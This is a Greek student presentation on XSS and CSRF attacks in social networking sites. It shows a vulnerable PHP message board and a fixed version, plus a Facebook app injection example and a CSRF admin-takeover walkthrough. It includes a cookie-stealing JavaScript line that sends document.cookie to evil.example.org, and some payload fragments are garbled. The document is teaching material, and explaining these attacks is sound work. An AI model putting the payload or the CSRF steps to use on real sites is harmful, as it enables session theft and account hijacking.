«Αντί-κοινωνική Δικτύωση» Εκμετάλλευση της εμπιστοσύνης των ιστοσελίδων σε περιβάλλον WEB 2.0

Ελέυθερα API Οι Ιστότοποι κοινωνικής δικτύωσης έχουν δημιουργήσει ένα πολύ επικίνδυνο μίγμα αυτό των ανοιχτών API που κυκλοφορούν ελεύθερα για την ενσωμάτωση σε εφαρμογές τρίτων και την βαριά χρήση του κώδικα από την πλευρά του χρήστη.

XSS και CSRF XSS (Cross-site scripting ) είναι ένας τύπος ευπάθειας σε web εφαρμογές και επιτρέπει σε χρήστες να παρακάμψουν τους ελέγχους ασφαλείας και να προσθέσουν στην ιστοσελίδα κώδικα ο οποίος θα είναι ορατός από τους υπόλοιπους χρήστες. CSRF(Cross-site Request Forgeries ) το οποίο αφορά την εκτέλεση εντολών από χρήστη τον οποίο έχει εμπιστευτεί «κακώς» η ιστοσελίδα. Συχνά το συνδέουν με όρους της πιστοποίησης.

Cross-site scripting ‣ Εκμεταλλεύεται την εμπιστοσύνη Χρήστη/ περιηγητή σε μια τοποθεσία Web ‣ αφορούν συνήθως τοποθεσίες (φόρουμ, Web πελάτες ηλεκτρονικού ταχυδρομείου, RSS readers ) ‣ Εισάγουν το περιεχόμενο του εισβολέα κατ’ επιλογή. ‣ Σκοπός συνήθως είναι να αποκτήσουν πληροφορίες για έναν χρήστη.

Τυπική διαδικασία XSS ‣ Κακόβουλος χρήστης επισκέπτεται ευάλωτη σελίδα ‣ Κακόβουλος χρήστης εκμεταλλεύεται την αδυναμία της σελίδας τρέχοντας ένα javascript στην σελίδα. ‣ Ο κώδικας javascript που έτρεξε στην σελίδα στέλνει συνήθως πληροφορίες σε μια άλλη σελίδα ιδού και ο ορισμός Cross-site. ‣ Ένας αφελής χρήστης θα επισκεφθεί την ευάλωτη περιοχή ‣ Αυτός τρέχει την σελίδα με το κακόβουλο λογισμικό χωρίς να το καταλάβει. ‣ Τελικά οι πληροφορίες του στέλνονται στους κακόβουλους χρήστες εν’ αγνοία τους.

Κώδικας σελίδας Κώδικας Φόρμας Αποστολής Κώδικας Που λαμβάνει τα δεδομένα <?php if (isset($_POST['message'])) { file_put_contents('board.txt', "{$_POST['message']} ", FILE_APPEND); } $messages = file_get_contents('board.txt'); echo $messages; ?> Κώδικας Που ενσωματώνει ο Κακόβουλος χρήστης. document.location = ' evil.example.org/steal_cookies.php? cookies=' + document.cookie

Πρόληψη XSS ‣ Φιλτράρισμα στα εισερχόμενα δεδομένα - για να εξασφαλίστει ότι αυτά που έχουν εισαχθεί είναι τα αναμενόμενα ‣ Χρησιμοποιήστε μια προσέγγιση τύπου whitelist (Μόνο επιτρεπόμενες τιμές) ‣ Χρησιμοποιούμε έναν αυστηρό τρόπο ονοματοδωσίας μεταβλητών ‣ Να χρησιμοποιούμε δικές μας PHP ή ASP functions έτσι ώστε να αποφύγουμε την εκροή δεδομένων που πρέπει να μείνουν κρυφά στην σελίδα. Παράδειγμα ποιο ασφαλούς κώδικα <?php if (isset($_POST['message'])) { file_put_contents('board.txt', "{$_POST['message']} ", FILE_APPEND); } $messages = file_get_contents('board.txt'); echo htmlentities($messages); ?>

Cross Site Request Forgery ‣ Εκμεταλλεύεται ότι εμπιστεύεται ο χρήστης μια ιστοσελίδα ‣ Συνήθως συμβαίνει σε σελίδες με ταυτοποίηση χρηστών ‣ Ο εισβολέας πραγματοποιεί επιθέσεις HTTP ‣ Σκοπός είναι να ξεγελάσει τον χρήστη εκτελώντας ενα HTTP request

Τυπική διαδικασία CSRF ‣ Ο κακόβουλος χρήστης επισκέπτεται ευάλωτη περιοχή ‣ Ο κακόβουλος χρήστης στέλνει ένα HTTP request με ένα IMG TAG ή οποιονδήποτε άλλο κώδικα επιθυμεί ‣ Ο κώδικας δημοσιεύεται και εκμεταλλεύεται την δυνατότητα να στέλνει πληροφορίες κάθε φορά που εκτελείτε σε άλλη σελίδα. ‣ Ο καλός χρήστης θα επισκεφθεί την ευάλωτη ιστοσελίδα ‣ Ο καλός χρήστης χρήστη φορτώνει την σελίδα που έχει εμπλουτιστεί με βλαβερό κώδικα ‣ Ο καλός χρήστης προκαλεί εν’ αγνοία του ένα HTTP request να σταλεί σε άλλη σελίδα. Σημ: Οι περιηγητές δεν περιορίζουν την ετικέτα IMG να συγκεκριμένους τύπους εικόνας. Η IMG ετικέτα θα μπορούσε να δείξει μια σελίδα αντί για μια Εικόνα.

Πρόληψη CSRF ‣ Χρήση POST αντί GET σε φόρμες ‣ Χρησιμοποιήούμε $ _POST και όχι register_globals. ‣ Δεν δίνουμε έμφαση στην ευκολία ‣ Προσπαθούμε να αποφεύγουμε έτοιμες φόρμες και δημιουργούμε τις δικές μας.

Ευπάθεια σε Ιστοσελίδες κοινωνικής Δικτύωσης 1 Πολλές από τις εφαρμογές του Facebook, ακόμα και αυτά που χρησιμοποιούνται ευρέως είναι φαινομενικά αξιόπιστα αλλά υπάρχει έλλειψη βασικές προφυλάξεις ασφάλειας. 2 Συγκεκριμένα εξαιτίας του cross-site scripting βρέθηκαν κενά ασφαλείας σε ένα ευρύ φάσμα εφαρμογών του Facebook. 3. Κάθε τέτοια κενά ασφαλείας μπορεί να αξιοποιηθουν για να εκτελέσουν κακόβουλα JavaScript, όπως η παροχή malware (Επίσης, ως Malware χαρακτηρίζεται και το λεγόμενο Scumware. To Scumware αλλάζει τον τρόπο, με τον οποίο βλέπουμε τους ιστοχώρους που επισκέπτεστε. Αντικαθιστά το πραγματικό περιεχόμενο με διαφημίσεις από τους διαφημιστές scumware.) 4. Επιπλέον, οι τρύπες επιτρέπουν σε έναν εισβολέα να αποκτήσει πρόσβαση προφίλ πληροφορίες, συμπεριλαμβανομένων των προσωπικών στοιχείων, ενημερώσεις κατάστασης, και φωτογραφίες, με θύμα τον χρήστη και τους φίλους του. 5. Επιπλέον, κενά ασφάλειας μπορεί να χρησιμοποιηθούν για να στείλουν τις κοινοποιήσεις με συνδέσμους που περιέχουν ιούς. 6. Όλα τα τρωτά σημεία που αναφέρθηκαν στη σειρά έχουν επιδιορθωθεί, αλλά οι επιθέσεις που εκμεταλλεύονται τα κενά εφαρμογής, είναι εφικτή ακόμη και σήμερα.

Facebook και κενά Ασφαλείας Στο Facebook η εφαρμογή "Faceplant" περιλαμβάνει μια παράμετρο "ref" στην αρχική της σελίδα, δηλαδή f=install. Έχουμε δηλαδή τον σύνδεσμο της εφαρμογής. Τέλος, ας υποθέσουμε ότι στην αίτηση δεν φιλτράρουν τη "ref" παράμετρο π.χ. τον κώδικα PHP echo ‘ ’;. Όπως μπορείτε πιθανώς να δούμε, η "ref" παράμετρος εισάγει ένα cross-site scripting κενό ασφαλείας. Για παράδειγμα, η φόρτωση της σελίδας f = "> θα έδειχνε μια εικόνα κατά την φόρτωση της σελίδας. Υποθέτοντας ότι το Faceplant είναι μια εφαρμογή FBML( Facebook Markup Language), θα μπορούσε κανείς να φορτώσει ένα URI παρόμοια με f = "> src= <fb:iframe με αυτό τον τρόπο μπορεί να ενσωματώσει ένα iframe εντός της σελίδας. Δεδομένου ότι η πηγή των iframes είναι αυθαίρετη, θα μπορούσε κανείς να φορτώσει μια σελίδα που εκτελεί κακόβουλες δέσμες ενεργειών, όπως η παροχή κακόβουλο λογισμικό ή εκμετάλλευση του προγράμματος περιήγησης.

Απλό Παράδειγμα απλής Επίθεσης CSRF σε Forum κοινωνικής Δικτύωσης Αναλαμβάνουμε ρόλους Admin Πρόσβαση σε Cookies του Admin φτιάχνουμε μόνοι μας ένα πρόγραμμα ή μια εντολή η οποία είναι η ίδια που εκτελείται από το forum όταν ο πραγματικός διαχειριστής θέλει να κάνει κάποια ενέργεια (βοήθεια με το Live Http Headers του firefox) Αφού την φτιάξουμε θα την βάλουμε σε ένα link το οποίο με κάποιο τρόπο θα στείλουμε στον διαχειριστή και θα τον ωθήσουμε να το πατήσει (με την θέληση του ή μη). Ενσωματώνουμε το HTTP request σε μια εικόνα Όταν τρέξει την σελίδα μας θα οδηγηθεί εκεί και θα εκτελεστεί η εντολή μας. Ο server θα διαβάσει το cookie του Admin και θα εκτελέσει την εντολή με δικαιώματα διαχειριστή. Αυτό είναι ένα απλό παράδειγμα όταν γίνεται χρήση των μεταβλητών GET.

Paypal API XSS Πρέπει να σημειωθεί αν και δεν κατατάσσεται στην κατηγορία των ιστοσελίδων κοινωνικής δικτύωσης, ότι ίδιου τύπου επιθέσεις εκμεταλλευόμενοι το κενό ασφαλείας XSS (Cross-site scripting) Hackers έχουν επιτεθεί σε ιστοσελίδες οι οποίες δουλεύουν με το API της Paypal ( και προσθέτοντας το δικό τους περιεχόμενο στις σελίδες αυτές κατάφεραν να κλέβουν πιστοποιήσεις από τους χρήστες. Το ζουμί της υπόθεσης είναι ότι οι σελίδες βρίσκονταν σε Server ο οποίος είχε ενεργοποιημένο το SSL πιστοποιητικό ασφάλειας το οποίο πιστοποιητικό το έβλεπαν οι χρήστες (με την πράσινη ένδειξη στον browser και με το σύμβολο της κλειδαριάς) και πίστευαν ότι τα στοιχεία τους είναι ασφαλή. Ενώ τα πιστοποιητικά SSL παρέχουν όντως ένα υψηλότερο επίπεδο αξιοπιστίας όσον αφορά την κυριότητα της ιστοσελίδας, δεν μπορουν να εγγυηθούν ότι η ιστοσελίδα είναι απαλλαγμένη από άλλα προβλήματα ασφαλείας - συμπεριλαμβανομένων των scripting cross-site. Υπάρχουν ανησυχίες ότι οι χάκερ μπορούν να εκμεταλλευτούν τη σημασία της πράσινης γραμμής διευθύνσεων για δικό τους όφελος. Οι χρήστες πρέπει να γνωρίζουν ότι μια πράσινη γραμμή διευθύνσεων δεν εγγυάται την προέλευση του περιεχομένου μιας σελίδας, εάν υπάρχει μια cross-site scripting ευπάθεια σε αυτήν τη σελίδα.

Σας Ευχαριστώ «Αντί-κοινωνική Δικτύωση» Εκμετάλλευση της εμπιστοσύνης των ιστοσελίδων σε περιβάλλον WEB 2.0 Εργασία Δικτύων 3 ΑΜ:2211 Ονομ/πωνυμο:Γιώργος Γεωργιάδης Εξάμηνο:7ο